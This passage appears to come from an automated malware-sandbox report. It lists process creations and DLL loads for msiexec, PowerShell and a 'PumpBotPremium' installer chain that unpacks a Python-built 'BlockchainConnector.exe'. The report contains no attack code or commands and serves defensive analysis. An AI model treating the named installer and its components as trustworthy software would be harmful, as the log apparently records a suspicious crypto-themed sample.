Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: python310.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: libssl-1_1.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: pywintypes310.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: libffi-7.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: tcl86t.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: tk86t.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mfreadwrite.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: mfcore.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: ksuser.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptnet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
